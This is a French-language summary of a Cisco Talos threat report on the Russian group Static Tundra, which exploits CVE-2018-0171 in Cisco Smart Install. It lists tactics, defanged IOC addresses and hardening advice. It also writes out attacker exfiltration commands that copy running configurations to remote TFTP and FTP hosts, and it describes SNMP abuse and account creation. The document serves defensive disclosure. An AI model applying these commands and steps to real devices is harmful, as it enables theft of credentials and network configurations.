Source: Cisco Talos — Dans un billet signé par Sara McBroom, Talos détaille une campagne d’espionnage étatique menée par le groupe russe Static Tundra, actif depuis plus d’une décennie et lié au FSB (Center 16), visant des équipements réseau Cisco non patchés pour des accès persistants et la collecte de renseignements.

Le groupe exploite agressivement depuis au moins 2021 la vulnérabilité CVE-2018-0171 dans la fonctionnalité Smart Install (Cisco IOS/IOS XE), patchée en 2018 mais encore présente sur des équipements non mis à jour ou en fin de vie. Les cibles prioritaires sont les télécoms, l’enseignement supérieur et la fabrication en Amérique du Nord, Asie, Afrique et Europe, avec une intensification notable contre l’Ukraine depuis le début de la guerre. Static Tundra récupérerait les configurations pour des usages ultérieurs, en fonction des priorités stratégiques russes.

Tactiques clés: après exploitation de CVE-2018-0171, l’acteur active un serveur TFTP local (commande: tftp-server nvram:startup-config) pour exfiltrer la configuration startup et en extraire identifiants et chaînes SNMP. Il peut aussi entrer via SNMP en abusant de chaînes faibles comme “anonymous” et “public” (RW), parfois en usurpant l’adresse source pour contourner des ACL. L’exécution passe par SNMP pour modifier la configuration en cours, créer des comptes locaux et activer TELNET. La persistance s’appuie sur des identifiants/chaînes SNMP compromis, des comptes privilégiés, et le firmware implant SYNful Knock (accès par « magic packet » TCP SYN, persistant aux redémarrages). L’évasion inclut la modification de la config TACACS+ et des ACL. La découverte s’effectue via données publiques (Shodan/Censys) et commandes natives (show cdp neighbors). La collecte consiste à détourner du trafic via tunnels GRE et à récupérer des données NetFlow. L’exfiltration utilise TFTP/FTP/SNMP (CISCO-CONFIG-COPY-MIB), p.ex. do show running-config | redirect tftp://:/conf_bckp et copy running-config ftp://user:pass@/output.txt.

Détection et prévention résumées par Talos: gestion et audit de configuration, surveillance AAA et syslog (baisses/gaps), profilage des équipements (ports/NetFlow), détection d’anomalies de comportement, examens forensiques Cisco. Mesures Cisco: appliquer le correctif CVE-2018-0171, désactiver Smart Install (no vstack) si patch impossible, appliquer les guides de durcissement, désactiver telnet (transport input ssh; transport output none), utiliser mots de passe Type 8 et clé TACACS+ Type 6. Mesures générales: mises à jour agressives, remplacement des matériels EoL, MFA, chiffrement des protocoles d’administration (SNMPv3, HTTPS, SSH, NETCONF, RESTCONF), durcissement TACACS+/AAA, limitation/exposition des interfaces d’admin, ACL correctes, gestion centralisée des configurations.

IOC (extraits):

  • IP 185.141.24[.]222 — activité observée: 2023/03/23
  • IP 185.82.202[.]34 — activité observée: 2025/01/15 – 2025/02/28
  • IP 185.141.24[.]28 — activité observée: 2024/10/01 – 2025/07/03
  • IP 185.82.200[.]181 — activité observée: 2024/10/01 – 2024/11/15

TTPs observés (sélection):

  • Exploitation: CVE-2018-0171 (Smart Install); activation TFTP; extraction de configuration; accès SNMP (chaînes faibles), usurpation d’adresse source
  • Exécution: modification de running-config via SNMP; ajout de comptes; activation de TELNET
  • Persistance: chaînes SNMP RW, comptes locaux; implant SYNful Knock (accès par paquet TCP SYN)
  • Évasion: modification TACACS+ et ACL
  • Découverte: Shodan/Censys; commandes natives (show cdp neighbors)
  • Collection: tunnels GRE; NetFlow
  • Exfiltration: TFTP/FTP/SNMP (CISCO-CONFIG-COPY-MIB); commandes do show running-config | redirect tftp://:/conf_bckp et copy running-config ftp://user:pass@/output.txt

Conclusion: il s’agit d’une analyse de menace signée Cisco Talos visant à documenter la campagne « Static Tundra », ses TTPs et IOCs, et à fournir des pistes de détection et de durcissement associées.

🧠 TTPs et IOCs détectés

TTP

[‘Exploitation: CVE-2018-0171 (Smart Install); activation TFTP; extraction de configuration; accès SNMP (chaînes faibles), usurpation d’adresse source’, ‘Exécution: modification de running-config via SNMP; ajout de comptes; activation de TELNET’, ‘Persistance: chaînes SNMP RW, comptes locaux; implant SYNful Knock (accès par paquet TCP SYN)’, ‘Évasion: modification TACACS+ et ACL’, ‘Découverte: Shodan/Censys; commandes natives (show cdp neighbors)’, ‘Collection: tunnels GRE; NetFlow’, ‘Exfiltration: TFTP/FTP/SNMP (CISCO-CONFIG-COPY-MIB); commandes do show running-config | redirect tftp://:/conf_bckp et copy running-config ftp://user:pass@/output.txt’]

IOC

[‘IP 185.141.24[.]222’, ‘IP 185.82.202[.]34’, ‘IP 185.141.24[.]28’, ‘IP 185.82.200[.]181’]

🔗 Source originale : https://blog.talosintelligence.com/static-tundra/